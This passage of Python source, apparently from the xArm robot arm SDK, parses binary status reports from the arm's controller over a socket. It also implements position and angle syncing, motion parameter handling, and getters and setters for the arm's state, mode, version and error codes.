pose_offset[i] = float('{:.6f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.6f}'.format(pose_offset[i][0]))
if math.inf not in pose and -math.inf not in pose and not (10 <= self._error_code <= 17):
self._position = pose
if math.inf not in angles and -math.inf not in angles and not (10 <= self._error_code <= 17):
self._angles = angles
if math.inf not in pose_offset and -math.inf not in pose_offset and not (10 <= self._error_code <= 17):
self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code != 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_rich(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
__handle_report_normal(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[87:93]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
if self._arm_type == 5:
self._arm_axis = 5
elif self._arm_type == 6:
self._arm_axis = 6
elif self._arm_type == 3:
self._arm_axis = 7
ver_msg = rx_data[93:122]
# self._version = str(ver_msg, 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[123:143], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[143:163], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[163:171], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
sv3_msg = convert.bytes_to_u16s(rx_data[171:187], 8)
self._first_report_over = True
main_socket_connected = self._stream and self._stream.connected
report_socket_connected = self._stream_report and self._stream_report.connected
while self._stream and self._stream.connected:
try:
if not self._stream_report or not self._stream_report.connected:
self.get_err_warn_code()
if report_socket_connected:
report_socket_connected = False
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
self._connect_report()
continue
if not report_socket_connected:
report_socket_connected = True
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
rx_data = self._stream_report.read()
if rx_data != -1 and len(rx_data) >= 87:
if len(rx_data) == 87:
__handle_report_normal(rx_data)
elif len(rx_data) >= 187:
__handle_report_rich(rx_data)
except Exception as e:
logger.error(e)
time.sleep(0.001)
self.disconnect()
self._report_connect_changed_callback(False, False)
def _report_thread_handle(self):
def __handle_report_real(rx_data):
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
if state in [4, 5]:
self._is_ready = False
else:
self._is_ready = True
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
for i in range(len(pose)):
if i < 3:
pose[i] = float('{:.3f}'.format(pose[i]))
# pose[i] = float('{:.3f}'.format(pose[i][0]))
else:
pose[i] = float('{:.6f}'.format(pose[i]))
# pose[i] = float('{:.6f}'.format(pose[i][0]))
for i in range(len(angles)):
angles[i] = float('{:.6f}'.format(angles[i]))
# angles[i] = float('{:.6f}'.format(angles[i][0]))
if math.inf not in pose and -math.inf not in pose and not (10 <= self._error_code <= 17):
self._position = pose
if math.inf not in angles and -math.inf not in angles and not (10 <= self._error_code <= 17):
self._angles = angles
self._joints_torque = torque
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_normal(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]), len(rx_data))
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
# if state != self._state or mode != self._mode:
# print('mode: {}, state={}, time={}'.format(mode, state, time.time()))
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
mtbrake, mtable, error_code, warn_code = rx_data[87:91]
pose_offset = convert.bytes_to_fp32s(rx_data[91:6 * 4 + 91], 6)
tcp_load = convert.bytes_to_fp32s(rx_data[115:4 * 4 + 115], 4)
collis_sens, teach_sens = rx_data[131:133]
# if (collis_sens not in list(range(6)) or teach_sens not in list(range(6))) \
# and ((error_code != 0 and error_code not in controller_error_keys) or (warn_code != 0 and warn_code not in controller_warn_keys)):
# self._stream_report.close()
# logger.warn('ReportDataException: data={}'.format(rx_data))
# return
length = convert.bytes_to_u32(rx_data[0:4])
data_len = len(rx_data)
if (length != data_len and (length != 233 or data_len != 245)) or collis_sens not in list(range(6)) or teach_sens not in list(range(6)) \
or mode not in list(range(12)) or state not in list(range(10)):
self._stream_report.close()
logger.warning('ReportDataException: length={}, data_len={}, '
'state={}, mode={}, collis_sens={}, teach_sens={}, '
'error_code={}, warn_code={}'.format(
length, data_len,
state, mode, collis_sens, teach_sens, error_code, warn_code
))
return
self._gravity_direction = convert.bytes_to_fp32s(rx_data[133:3*4 + 133], 3)
if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
self.modbus_baud = -1
self.robotiq_is_activated = False
self.gripper_is_enabled = False
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = -1
self.gripper_speed = -1
self.gripper_version_numbers = [-1, -1, -1]
# print('torque: {}'.format(torque))
# print('tcp_load: {}'.format(tcp_load))
# print('collis_sens: {}, teach_sens: {}'.format(collis_sens, teach_sens))
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('ControllerError, code: {}'.format(self._error_code), color='red')
else:
pretty_print('ControllerError has been cleared', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('ControllerWarning, code: {}'.format(self._warn_code), color='yellow')
else:
pretty_print('ControllerWarning has been cleared', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}, mode={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable, mode
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if _state == 3 and self.state != 3:
with self._cond_pause:
self._cond_pause.notify_all()
self._mode = mode
self._cmd_num = cmd_num
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
self._joints_torque = torque
if compare_version(self.version_number, (0, 2, 0)):
self._tcp_load = [tcp_load[0], [i for i in tcp_load[1:]]]
else:
self._tcp_load = [tcp_load[0], [i * 1000 for i in tcp_load[1:]]]
self._collision_sensitivity = collis_sens
self._teach_sensitivity = teach_sens
for i in range(len(pose)):
if i < 3:
pose[i] = float('{:.3f}'.format(pose[i]))
# pose[i] = float('{:.3f}'.format(pose[i][0]))
else:
pose[i] = float('{:.6f}'.format(pose[i]))
# pose[i] = float('{:.6f}'.format(pose[i][0]))
for i in range(len(angles)):
angles[i] = float('{:.6f}'.format(angles[i]))
# angles[i] = float('{:.6f}'.format(angles[i][0]))
for i in range(len(pose_offset)):
if i < 3:
pose_offset[i] = float('{:.3f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.3f}'.format(pose_offset[i][0]))
else:
pose_offset[i] = float('{:.6f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.6f}'.format(pose_offset[i][0]))
if math.inf not in pose and -math.inf not in pose and not (10 <= self._error_code <= 17):
self._position = pose
if math.inf not in angles and -math.inf not in angles and not (10 <= self._error_code <= 17):
self._angles = angles
if math.inf not in pose_offset and -math.inf not in pose_offset and not (10 <= self._error_code <= 17):
self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code != 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_rich(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
# print('interval={}, max_interval={}'.format(interval, self._max_report_interval))
__handle_report_normal(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[145:151]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
# self._version = str(rx_data[151:180], 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[181:201], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[201:221], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[221:229], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
servo_codes = [val for val in rx_data[229:245]]
for i in range(self.axis):
if self._servo_codes[i][0] != servo_codes[i * 2] or self._servo_codes[i][1] != servo_codes[i * 2 + 1]:
print('servo_error_code, servo_id={}, status={}, code={}'.format(i + 1, servo_codes[i * 2], servo_codes[i * 2 + 1]))
self._servo_codes[i][0] = servo_codes[i * 2]
self._servo_codes[i][1] = servo_codes[i * 2 + 1]
self._first_report_over = True
# length = convert.bytes_to_u32(rx_data[0:4])
length = len(rx_data)
if length >= 252:
temperatures = list(map(int, rx_data[245:252]))
if temperatures != self.temperatures:
self._temperatures = temperatures
self._report_temperature_changed_callback()
if length >= 284:
speeds = convert.bytes_to_fp32s(rx_data[252:8 * 4 + 252], 8)
self._realtime_tcp_speed = speeds[0]
self._realtime_joint_speeds = speeds[1:]
# print(speeds[0], speeds[1:])
if length >= 288:
count = convert.bytes_to_u32(rx_data[284:288])
# print(count, rx_data[284:288])
if self._count != -1 and count != self._count:
self._count = count
self._report_count_changed_callback()
self._count = count
if length >= 312:
world_offset = convert.bytes_to_fp32s(rx_data[288:6 * 4 + 288], 6)
for i in range(len(world_offset)):
if i < 3:
world_offset[i] = float('{:.3f}'.format(world_offset[i]))
else:
world_offset[i] = float('{:.6f}'.format(world_offset[i]))
if math.inf not in world_offset and -math.inf not in world_offset and not (10 <= self._error_code <= 17):
self._world_offset = world_offset
if length >= 314:
self._cgpio_reset_enable, self._tgpio_reset_enable = rx_data[312:314]
if length >= 417:
self._is_simulation_robot = bool(rx_data[314])
self._is_collision_detection, self._collision_tool_type = rx_data[315:317]
self._collision_tool_params = convert.bytes_to_fp32s(rx_data[317:341], 6)
voltages = convert.bytes_to_u16s(rx_data[341:355], 7)
voltages = list(map(lambda x: x / 100, voltages))
self._voltages = voltages
currents = convert.bytes_to_fp32s(rx_data[355:383], 7)
self._currents = currents
cgpio_states = []
cgpio_states.extend(rx_data[383:385])
cgpio_states.extend(convert.bytes_to_u16s(rx_data[385:401], 8))
cgpio_states[6:10] = list(map(lambda x: x / 4095.0 * 10.0, cgpio_states[6:10]))
cgpio_states.append(list(map(int, rx_data[401:409])))
cgpio_states.append(list(map(int, rx_data[409:417])))
if length >= 433:
cgpio_states[-2].extend(list(map(int, rx_data[417:425])))
cgpio_states[-1].extend(list(map(int, rx_data[425:433])))
self._cgpio_states = cgpio_states
main_socket_connected = self._stream and self._stream.connected
report_socket_connected = self._stream_report and self._stream_report.connected
buffer = b''
size = 0
while self._stream and self._stream.connected:
try:
if not self._stream_report or not self._stream_report.connected:
self.get_err_warn_code()
if report_socket_connected:
report_socket_connected = False
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
self._connect_report()
buffer = b''
size = 0
continue
if not report_socket_connected:
report_socket_connected = True
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
recv_data = self._stream_report.read(1)
if recv_data != -1:
buffer += recv_data
if len(buffer) < 4:
continue
if size == 0:
size = convert.bytes_to_u32(buffer[0:4])
if len(buffer) < size:
continue
if self._report_type == 'real':
data = buffer[:size]
buffer = buffer[size:]
__handle_report_real(data)
elif size >= XCONF.SocketConf.TCP_REPORT_NORMAL_BUF_SIZE:
if size >= XCONF.SocketConf.TCP_REPORT_RICH_BUF_SIZE:
if size == 233 and len(buffer) == 245:
data = buffer[:245]
buffer = buffer[245:]
else:
data = buffer[:size]
buffer = buffer[size:]
__handle_report_rich(data)
else:
data = buffer[:size]
buffer = buffer[size:]
__handle_report_normal(data)
else:
if self._stream and self._stream.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self._stream or not self._stream.connected:
break
elif not self._stream_report or not self._stream_report.connected:
self._connect_report()
except Exception as e:
logger.error(e)
if self._stream and self._stream.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self._stream or not self._stream.connected:
break
if not self._stream_report or not self._stream_report.connected:
self._connect_report()
time.sleep(0.001)
self.disconnect()
self._report_connect_changed_callback(False, False)
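# Note on the receive loop above: report frames are length-prefixed. The first
# four bytes of the stream carry the frame size, which is parsed once (report
# frames keep a fixed size for a given connection) and then used to slice
# complete frames out of the accumulated byte buffer; each frame is dispatched
# to __handle_report_real, __handle_report_rich or __handle_report_normal
# depending on the configured report type and the frame size.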
def _auto_get_report_thread(self):
logger.debug('get report thread start')
while self.connected:
try:
cmd_num = self._cmd_num
state = self._state
error_code = self._error_code
warn_code = self._warn_code
self.get_cmdnum()
time.sleep(0.01)
self.get_state()
time.sleep(0.01)
self.get_err_warn_code()
time.sleep(0.01)
self.get_servo_angle()
time.sleep(0.01)
self.get_position()
if state == 3 and self.state != 3:
with self._cond_pause:
self._cond_pause.notify_all()
if cmd_num != self._cmd_num:
self._report_cmdnum_changed_callback()
if state != self._state:
self._report_state_changed_callback()
if state in [4, 5]:
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._sleep_finish_time = 0
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
if error_code != self._error_code or warn_code != self._warn_code:
self._report_error_warn_changed_callback()
elif not self._only_report_err_warn_changed and (self._error_code != 0 or self._warn_code != 0):
self._report_error_warn_changed_callback()
self._report_location_callback()
self._report_callback()
if self._cmd_num >= self._max_cmd_num:
time.sleep(1)
self._first_report_over = True
time.sleep(0.1)
except:
pass
self._report_connect_changed_callback(False, False)
logger.debug('get report thread stopped')
def _sync_tcp(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_angles = self._angles.copy()
if index is None:
self._last_position = self._position.copy()
elif isinstance(index, int) and 0 <= index < 6:
self._last_position[index] = self._position[index]
# print('=============sync_tcp: index={}'.format(index))
def _sync_joints(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
if index is None:
self._last_angles = self._angles.copy()
elif isinstance(index, int) and 0 <= index < 7:
self._last_angles[index] = self._angles[index]
# print('=============sync_joint: index={}'.format(index))
def _sync(self):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
self._last_angles = self._angles.copy()
# print('=============sync_all')
def _set_params(self, **kwargs):
is_radian = kwargs.get('is_radian', self._default_is_radian)
if 'X' in kwargs and isinstance(kwargs['X'], (int, float)):
self._last_position[0] = kwargs.get('X')
if 'Y' in kwargs and isinstance(kwargs['Y'], (int, float)):
self._last_position[1] = kwargs.get('Y')
if 'Z' in kwargs and isinstance(kwargs['Z'], (int, float)):
self._last_position[2] = kwargs.get('Z')
if 'A' in kwargs and isinstance(kwargs['A'], (int, float)):
self._last_position[3] = kwargs.get('A') if is_radian else math.radians(kwargs.get('A'))
if 'B' in kwargs and isinstance(kwargs['B'], (int, float)):
self._last_position[4] = kwargs.get('B') if is_radian else math.radians(kwargs.get('B'))
if 'C' in kwargs and isinstance(kwargs['C'], (int, float)):
self._last_position[5] = kwargs.get('C') if is_radian else math.radians(kwargs.get('C'))
# if 'R' in kwargs and isinstance(kwargs['R'], (int, float)):
# self._last_position[6] = kwargs.get('R')
if 'I' in kwargs and isinstance(kwargs['I'], (int, float)):
self._last_angles[0] = kwargs.get('I') if is_radian else math.radians(kwargs.get('I'))
if 'J' in kwargs and isinstance(kwargs['J'], (int, float)):
self._last_angles[1] = kwargs.get('J') if is_radian else math.radians(kwargs.get('J'))
if 'K' in kwargs and isinstance(kwargs['K'], (int, float)):
self._last_angles[2] = kwargs.get('K') if is_radian else math.radians(kwargs.get('K'))
if 'L' in kwargs and isinstance(kwargs['L'], (int, float)):
self._last_angles[3] = kwargs.get('L') if is_radian else math.radians(kwargs.get('L'))
if 'M' in kwargs and isinstance(kwargs['M'], (int, float)):
self._last_angles[4] = kwargs.get('M') if is_radian else math.radians(kwargs.get('M'))
if 'N' in kwargs and isinstance(kwargs['N'], (int, float)):
self._last_angles[5] = kwargs.get('N') if is_radian else math.radians(kwargs.get('N'))
if 'O' in kwargs and isinstance(kwargs['O'], (int, float)):
self._last_angles[6] = kwargs.get('O') if is_radian else math.radians(kwargs.get('O'))
if 'F' in kwargs and isinstance(kwargs['F'], (int, float)):
self._last_tcp_speed = kwargs.get('F')
self._last_tcp_speed = min(max(self._last_tcp_speed, self._min_tcp_speed), self._max_tcp_speed)
if 'Q' in kwargs and isinstance(kwargs['Q'], (int, float)):
self._last_tcp_acc = kwargs.get('Q')
self._last_tcp_acc = min(max(self._last_tcp_acc, self._min_tcp_acc), self._max_tcp_acc)
if 'F2' in kwargs and isinstance(kwargs['F2'], (int, float)):
self._last_joint_speed = kwargs.get('F2')
if not is_radian:
self._last_joint_speed = math.radians(self._last_joint_speed)
self._last_joint_speed = min(max(self._last_joint_speed, self._min_joint_speed), self._max_joint_speed)
if 'Q2' in kwargs and isinstance(kwargs['Q2'], (int, float)):
self._last_joint_acc = kwargs.get('Q2')
if not is_radian:
self._last_joint_acc = math.radians(self._last_joint_acc)
self._last_joint_acc = min(max(self._last_joint_acc, self._min_joint_acc), self._max_joint_acc)
if 'T' in kwargs and isinstance(kwargs['T'], (int, float)):
self._mvtime = kwargs.get('T')
if 'LIMIT_VELO' in kwargs and isinstance(kwargs['LIMIT_VELO'], (list, tuple)) \
and len(kwargs['LIMIT_VELO']) == 2 and isinstance(kwargs['LIMIT_VELO'][0], (int, float)) \
and isinstance(kwargs['LIMIT_VELO'][1], (int, float)) \
and kwargs['LIMIT_VELO'][0] <= kwargs['LIMIT_VELO'][1]:
self._min_tcp_speed, self._max_tcp_speed = kwargs.get('LIMIT_VELO')
if 'LIMIT_ACC' in kwargs and isinstance(kwargs['LIMIT_ACC'], (list, tuple)) \
and len(kwargs['LIMIT_ACC']) == 2 and isinstance(kwargs['LIMIT_ACC'][0], (int, float)) \
and isinstance(kwargs['LIMIT_ACC'][1], (int, float)) \
and kwargs['LIMIT_ACC'][0] <= kwargs['LIMIT_ACC'][1]:
self._min_tcp_acc, self._max_tcp_acc = kwargs.get('LIMIT_ACC')
def _get_params(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
if is_radian:
return {
'lastPosition': self._last_position,
'lastAngles': self._last_angles,
'mvvelo': self._last_tcp_speed,
'mvacc': self._last_tcp_acc,
'tcpJerk': self._tcp_jerk,
'jointJerk': self._joint_jerk,
'angle_mvvelo': self._last_joint_speed,
'angle_mvacc': self._last_joint_acc,
'mvtime': self._mvtime,
'LIMIT_VELO': [self._min_tcp_speed, self._max_tcp_speed],
'LIMIT_ACC': [self._min_tcp_acc, self._max_tcp_acc],
'LIMIT_ANGLE_VELO': [self._min_joint_speed, self._max_joint_speed],
'LIMIT_ANGLE_ACC': [self._min_joint_acc, self._max_joint_acc],
}
else:
return {
'lastPosition': [math.degrees(self._last_position[i]) if 2 < i < 6 else self._last_position[i] for i in range(len(self._last_position))],
'lastAngles': [math.degrees(angle) for angle in self._last_angles],
'mvvelo': round(self._last_tcp_speed),
'mvacc': round(self._last_tcp_acc),
'tcpJerk': round(self._tcp_jerk),
'jointJerk': round(math.degrees(self._joint_jerk)),
'angle_mvvelo': round(math.degrees(self._last_joint_speed)),
'angle_mvacc': round(math.degrees(self._last_joint_acc)),
'mvtime': self._mvtime,
'LIMIT_VELO': list(map(round, [self._min_tcp_speed, self._max_tcp_speed])),
'LIMIT_ACC': list(map(round, [self._min_tcp_acc, self._max_tcp_acc])),
'LIMIT_ANGLE_VELO': list(map(round, [math.degrees(self._min_joint_speed), math.degrees(self._max_joint_speed)])),
'LIMIT_ANGLE_ACC': list(map(round, [math.degrees(self._min_joint_acc), math.degrees(self._max_joint_acc)])),
}
def _check_code(self, code, is_move_cmd=False):
if is_move_cmd:
if code in [0, XCONF.UxbusState.WAR_CODE]:
if self.arm_cmd.state_is_ready:
return 0
else:
return XCONF.UxbusState.STATE_NOT_READY
else:
return code
# return 0 if code in [0, XCONF.UxbusState.WAR_CODE] and self.arm_cmd.state_is_ready else XCONF.UxbusState.STATE_NOT_READY if not self.arm_cmd.state_is_ready else code
else:
return 0 if code in [0, XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE, XCONF.UxbusState.STATE_NOT_READY] else code
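# Note: for queries and ordinary setters, the controller's "error", "warning"
# and "state not ready" return codes are mapped to 0 so that cached data can
# still be returned; motion commands additionally require arm_cmd.state_is_ready,
# otherwise STATE_NOT_READY is reported back to the caller.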
def wait_until_cmdnum_lt_max(self):
if not self._check_cmdnum_limit or self._stream_type != 'socket' or not self._enable_report:
return
# if time.time() - self._last_report_time > 0.4:
# self.get_cmdnum()
if self._max_cmd_num / 2 < self.cmd_num < self._max_cmd_num:
self.get_cmdnum()
while self.cmd_num >= self._max_cmd_num:
if not self.connected:
return APIState.NOT_CONNECTED
elif self.has_error:
return APIState.HAS_ERROR
elif not self.state_is_ready:
return APIState.NOT_READY
elif self.is_stop:
return APIState.EMERGENCY_STOP
time.sleep(0.05)
@xarm_is_connected(_type='get')
def get_version(self):
ret = self.arm_cmd.get_version()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
version = ''.join(list(map(chr, ret[1:])))
self._version = version[:version.find('\0')]
return ret[0], self._version
@xarm_is_connected(_type='get')
def get_robot_sn(self):
ret = self.arm_cmd.get_robot_sn()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
robot_sn = ''.join(list(map(chr, ret[1:])))
self._robot_sn = robot_sn[:robot_sn.find('\0')]
return ret[0], self._robot_sn
@xarm_is_connected(_type='get')
def check_verification(self):
ret = self.arm_cmd.check_verification()
ret[0] = self._check_code(ret[0])
return ret[0], ret[1]
@xarm_is_connected(_type='get')
def get_position(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_tcp_pose()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
# self._position = [float('{:.6f}'.format(ret[i][0])) for i in range(1, 7)]
self._position = [float('{:.6f}'.format(ret[i])) for i in range(1, 7)]
return ret[0], [float(
'{:.6f}'.format(math.degrees(self._position[i]) if 2 < i < 6 and not is_radian else self._position[i])) for
i in range(len(self._position))]
@xarm_is_connected(_type='get')
def get_servo_angle(self, servo_id=None, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_joint_pos()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 7:
# self._angles = [float('{:.6f}'.format(ret[i][0])) for i in range(1, 8)]
self._angles = [float('{:.6f}'.format(ret[i])) for i in range(1, 8)]
if servo_id is None or servo_id == 8 or len(self._angles) < servo_id:
return ret[0], list(
map(lambda x: float('{:.6f}'.format(x if is_radian else math.degrees(x))), self._angles))
else:
return ret[0], float(
'{:.6f}'.format(self._angles[servo_id - 1] if is_radian else math.degrees(self._angles[servo_id - 1])))
@xarm_is_connected(_type='get')
def get_position_aa(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_position_aa()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
pose = [float('{:.6f}'.format(ret[i] if i <= 3 or is_radian else math.degrees(ret[i]))) for i in
range(1, 7)]
return ret[0], pose
return ret[0], ret[1:7]
@xarm_is_connected(_type='get')
def get_pose_offset(self, pose1, pose2, orient_type_in=0, orient_type_out=0, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
_pose1 = [pose1[i] if i <= 2 or is_radian else math.radians(pose1[i]) for i in range(6)]
_pose2 = [pose2[i] if i <= 2 or is_radian else math.radians(pose2[i]) for i in range(6)]
ret = self.arm_cmd.get_pose_offset(_pose1, _pose2, orient_type_in, orient_type_out)
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
pose = [float('{:.6f}'.format(ret[i] if i <= 3 or is_radian else math.degrees(ret[i]))) for i in
range(1, 7)]
return ret[0], pose
return ret[0], ret[1:7]
def get_is_moving(self):
self.get_state()
return self._state == 1
@xarm_is_connected(_type='get')
def get_state(self):
ret = self.arm_cmd.get_state()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._state = ret[1]
self._last_update_state_time = time.time()
return ret[0], ret[1] if ret[0] == 0 else self._state
@xarm_is_connected(_type='set')
def set_state(self, state=0):
_state = self._state
ret = self.arm_cmd.set_state(state)
ret[0] = self._check_code(ret[0])
if state == 4 and ret[0] == 0:
# self._last_position[:6] = self.position
# self._last_angles = self.angles
self._sleep_finish_time = 0
# self._is_sync = False
self.get_state()
if _state != self._state:
self._report_state_changed_callback()
if _state == 3 and self._state != 3:
with self._cond_pause:
self._cond_pause.notify_all()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[set_state], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[set_state], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> set_state({}) -> code={}, state={}'.format(state, ret[0], self._state), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_mode(self, mode=0):
ret = self.arm_cmd.set_mode(mode)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_mode({}) -> code={}'.format(mode, ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='get')
def get_cmdnum(self):
ret = self.arm_cmd.get_cmdnum()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
if ret[1] != self._cmd_num:
self._report_cmdnum_changed_callback()
self._cmd_num = ret[1]
self._last_update_cmdnum_time = time.time()
return ret[0], self._cmd_num
@xarm_is_connected(_type='get')
def get_err_warn_code(self, show=False, lang='en'):
ret = self.arm_cmd.get_err_code()
lang = lang if lang == 'cn' else 'en'
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._error_code, self._warn_code = ret[1:3]
self._last_update_err_time = time.time()
if show:
